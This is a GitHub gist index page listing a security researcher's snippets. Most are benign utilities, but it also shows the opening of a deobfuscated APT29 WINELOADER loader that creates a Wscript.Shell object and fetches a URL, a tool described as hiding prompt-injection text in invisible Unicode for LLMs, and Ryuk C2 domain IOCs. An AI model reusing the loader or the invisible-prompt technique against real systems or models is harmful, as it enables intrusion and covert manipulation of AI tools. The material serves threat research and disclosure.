Shadow0ps’s gists

Shadow0ps / APT29 WINELOADER SCRIPT.JS

Created March 25, 2024 23:18

An easier to read and understand version of the loader used by APT29 for WINELOADER. RE: https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties

	// Create a new ActiveXObject for Wscript.Shell
	var shell = new ActiveXObject("Wscript.Shell");

	// Define the Main function with a parameter for the URL
	function Main(url) {
	// Create a new XMLHttpRequest object
	var request = new XMLHttpRequest();

	// Define an event handler for when the request state changes
	request.onreadystatechange = function () {

Shadow0ps / Unighost_Prompt_Injection.py

Created January 12, 2024 07:15

Converts ASCII Prompts to Unicode Generating “Invisible” Prompts

	#This script helps generate unicode which is essentially hidden or "invisible" but is easily read by LLM's especially those that do not rely on a UI or Prescreening of prompts via API submission.
	#This wont be published until someone else discovers it as its too "valuable" to threat actors to publish given currently available mitigations.
	# V1.0: TLP RED! Do Not Distribute! Category: Hidden Injection Prompt! - 09/2023 - ShadowOpz
	# V2.0: TLP RED! Feature update: Added invisible clipboard functionality.
	# V3.0: Public Disclosure from Twitter discovered. Notes below.
	# V3.0 Notes: Released to public Gist 01/12/2024 after public disclosure from Twitter.
	# Kudos to @rezo_ and @goodside for the discovery and their pyperclip version.

Shadow0ps / EOMTv2.2.ps1

Last active October 5, 2022 15:42

Updated EOMTv2 URL Mitigation Script for ProxyNoShell 0-Day Protections (This is NOT Microsofts Mitigation which is broken as of 10-5-2022)

	<#
	MIT License

	Copyright (c) Microsoft Corporation.

	Permission is hereby granted, free of charge, to any person obtaining a copy
	of this software and associated documentation files (the "Software"), to deal
	in the Software without restriction, including without limitation the rights
	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	copies of the Software, and to permit persons to whom the Software is

Shadow0ps / minecraftfinder.py

Created June 15, 2021 21:11

A silly little script I fixed up to generate a list of Shodan results with Minecraft Server Information.

	#Use Shodan Search API Query product:minecraft to return a list of minecraft servers and their details
	#Example Output:
	#Players: 0 online - 250 maximum
	#Version: Paper 1.16.5 (protocol 754)
	#Description: Welcome to USC FOP 2021's Minecraft Server!
	#51.79.242.64
	#['ovh.ca']
	#Minecraft Server
	#Don't forget to add your own Shodan API Key below first
	#Usage is python3 minecraftfinder.py product:minecraft

Shadow0ps / App Short URI OSX & IOS.txt

Last active February 8, 2021 21:17

Example Apple Application Short Links

	aam:
	acrobat2018:
	acrobat:
	adbps:
	addressbook:
	adl:
	aem-asset:
	afp:
	apconfig:
	apple-reference-documentation:

Shadow0ps / RYUK UNC1878

Created October 29, 2020 12:52

UNC1978 IOC's From Madiant Team

	# C2 FQDNs
	first seen fqdn
	2019-12-11 23:37:10 updatemanagir.us
	2019-12-20 17:51:05 cmdupdatewin.com
	2019-12-26 18:03:27 scrservallinst.info
	2020-01-10 00:33:57 winsystemupdate.com
	2020-01-11 23:16:41 jomamba.best
	2020-01-13 05:13:43 updatewinlsass.com
	2020-01-16 11:38:53 winsysteminfo.com
	2020-01-20 05:58:17 livecheckpointsrs.com

Shadow0ps / NCMEC_REPORTER_PHOTODNA.PY

Created March 6, 2020 00:46

PHOTODNA API PYTHON SCRIPT FOR AUTOMATED NOTIFICATION TO NCMEC WITH ALL REQUIRED METADATA. REQUIRES DATA GUARDIAN OR OTHER 3RD PARTY INTEGRATION FEED LEARN MORE [email protected]

	##### ####### # # ###### ### ####### ### ####### # # # ###### # # ##### # #
	# # # # ## # # # # # # # # ## # ### # # # # # # # # #
	# # # # # # # # # # # # # # # # # # # # # # # # #
	# # # # # # # # # # # # # # # # ###### # # # # ###
	# # # # # # # # # # # # # # # # # # # # ####### # # #
	# # # # # ## # # # # # # # # ## ### # # # # # # # # #
	##### ####### # # ###### ### # ### ####### # # # ###### ####### # # ##### # #

	# # ##### # # ####### ##### ###### ####### ###### ####### ###### ####### ####### ######
	## # # # ## ## # # # # # #

Shadow0ps / hash160-to-base58.go

Created April 10, 2019 01:16 — forked from mathiasrw/hash160-to-base58.go

Convert hash160 hex strings to bitcoin bae58 address

	package main

	import (
	"bufio"
	"encoding/hex"
	"fmt"
	"github.com/btcsuite/btcutil/base58"
	"log"
	"os"
	)

Shadow0ps / badkeyboard.js

Last active January 20, 2019 04:50

	// ██████╗ █████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██████╗ ██████╗ █████╗ ██████╗ ██████╗ ██╗
	// ██╔══██╗██╔══██╗██╔══██╗██║ ██╔╝██╔════╝╚██╗ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██╔══██╗██╔══██╗██║
	// ██████╔╝███████║██║ ██║█████╔╝ █████╗ ╚████╔╝ ██████╔╝██║ ██║███████║██████╔╝██║ ██║██║
	// ██╔══██╗██╔══██║██║ ██║██╔═██╗ ██╔══╝ ╚██╔╝ ██╔══██╗██║ ██║██╔══██║██╔══██╗██║ ██║╚═╝
	// ██████╔╝██║ ██║██████╔╝██║ ██╗███████╗ ██║ ██████╔╝╚██████╔╝██║ ██║██║ ██║██████╔╝██╗
	// ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═╝
	// No Donut!
	// Built from code by : https://gist.github.com/jiaaro and a twitter post from: https://twitter.com/zackwhittaker/status/1084554101625626624
	// Not for malicious use. You assume all responsibility for anything you do with this. Don't be a jerk. If I find out you used this to hurt people.
	// Just remember TAKEN. Get what I'm sayin?

Shadow0ps / update.sh

Created July 10, 2018 19:22 — forked from Omeryl/update.sh

manage an OpenWRT LetsEncrypt https installation

	#!/usr/bin/env sh
	## update.sh - manage a OpenWRT LetsEncrypt https instalation
	# HOWTO:
	# - put update.sh in its own directory (like /root/.https)
	# - run ./update.sh your.domain.com (that domain needs to point to your router)
	# * this get an issued cert from letsencrypt.org using the webroot verification method
	# * also installs curl and ca-certificates packages
	# - use crontab -e; add the line `0 0 * * * "/root/.https/update.sh" >>/root/.https/log.txt 2>&`
	# * this runs the update every day, logging everything to log.txt
	#

Shadow0pz Shadow0ps